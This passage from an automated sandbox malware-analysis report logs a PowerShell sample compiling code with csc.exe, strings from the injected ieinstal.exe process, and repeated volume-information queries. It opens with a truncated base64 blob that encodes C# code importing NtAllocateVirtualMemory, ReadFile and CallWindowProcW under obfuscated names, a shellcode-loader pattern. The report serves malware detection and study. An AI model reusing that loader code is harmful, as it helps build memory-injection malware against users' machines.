QAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGMAcgBpAHAAdABlAHIAZQAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUANgAsAHIAZQBmACAASQBuAHQAMwAyACAAVABoAGUAbwByAGkAcwBlAHIAMgAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBjAHIAaQBwAHQAZQByAGUALABpAG4AdAAgAEwAZQBqAG4AaQA2ACwAaQBuAHQAIABTAGMAcgBpAHAAdABlAHIAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFAAcwBlAHUANAAsAHUAaQBuAHQAIABsAGkAbgBqAGUAcgAsAGkAbgB0ACAAUwBUAFIAWQAsAGkAbgB0ACAAUwBjAHIAaQBwAHQAZQByAGUAMAAsAGkAbgB0ACAAUwBFAEUAUgBOAEUALABpAG4AdAAgAFAAYQBjAGkAZgBpAGMAZQByADcALABpAG4AdAAgAEEAZAB2AGkAcwBlAG4AcwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMAAsAHUAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADEALABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAQQBVAFQATwBBAEMAVABJAFYARQAzACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEEAVQBUAE8AQQBDAFQASQBWAEUANQAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA2ACwAaQBuAHQAIABBAFUAVABPAEEAQwBUAEkAVgBFADcALABpAG4AdAAgAEEAVQBUAE8AQQBDAFQASQBWAEUAOAAsAGkAbgB0ACAAQQBVAFQATwBBAEMAVABJAFYARQA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHIAZQBmAHIAIABDAGEAbgBjAGUAcgBpAG4AYwBvACAATABpAG4AZwB1AGEAdAB1AGwAIABoAGUAYQBsAGUAIABMAEUAVgBJAEcAQQBUACAATABJAEcASwBJAFMAVABFACAAcwB2AG8AdgBsAC Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy0zjl34.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADA2.tmp" "c:\Users\user\AppData\Local\Temp\CSCB8D22C72555343A48341CA7311A8A12.TMP"
Source: ieinstal.exe, 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp Binary or memory string: Program Managerc
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.852789394.0000000003A90000.00000002.00020000.sdmp, ieinstal.exe, 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp, powershell.exe, 00000018.00000002.868881324.0000000003330000.00000002.00020000.sdmp, powershell.exe, 0000001C.00000002.878910701.0000000003330000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: ieinstal.exe, 00000014.00000002.852789394.0000000003A90000.00000002.00020000.sdmp, powershell.exe, 00000018.00000002.868881324.0000000003330000.00000002.00020000.sdmp, powershell.exe, 0000001C.00000002.878910701.0000000003330000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: ieinstal.exe, 00000014.00000002.852789394.0000000003A90000.00000002.00020000.sdmp, powershell.exe, 00000018.00000002.868881324.0000000003330000.00000002.00020000.sdmp, powershell.exe, 0000001C.00000002.878910701.0000000003330000.00000002.00020000.sdmp Binary or memory string: Progman
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp Binary or memory string: Program ManagerXYB2Q\y:
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp Binary or memory string: Program ManagerXYB2Q\
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp Binary or memory string: Program Managerr|
Source: ieinstal.exe, 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp Binary or memory string: Program Manageri
Source: ieinstal.exe, 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp Binary or memory string: Program ManagerW
Source: ieinstal.exe, 00000014.00000002.852416599.000000000361C000.00000004.00000020.sdmp Binary or memory string: Program ManagerX
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp Binary or memory string: Program Manager==n
Source: ieinstal.exe, 00000014.00000002.852789394.0000000003A90000.00000002.00020000.sdmp, powershell.exe, 00000018.00000002.868881324.0000000003330000.00000002.00020000.sdmp, powershell.exe, 0000001C.00000002.878910701.0000000003330000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp Binary or memory string: Program Manager32\cmd.exepe 001
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp Binary or memory string: Program Manager+=\
Source: ieinstal.exe, 00000014.00000002.852534659.000000000364B000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.852441123.000000000362A000.00000004.00000020.sdmp Binary or memory string: |Program Manager|
Source: ieinstal.exe, 00000014.00000002.852441123.000000000362A000.00000004.00000020.sdmp Binary or memory string: [Program Manager]

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
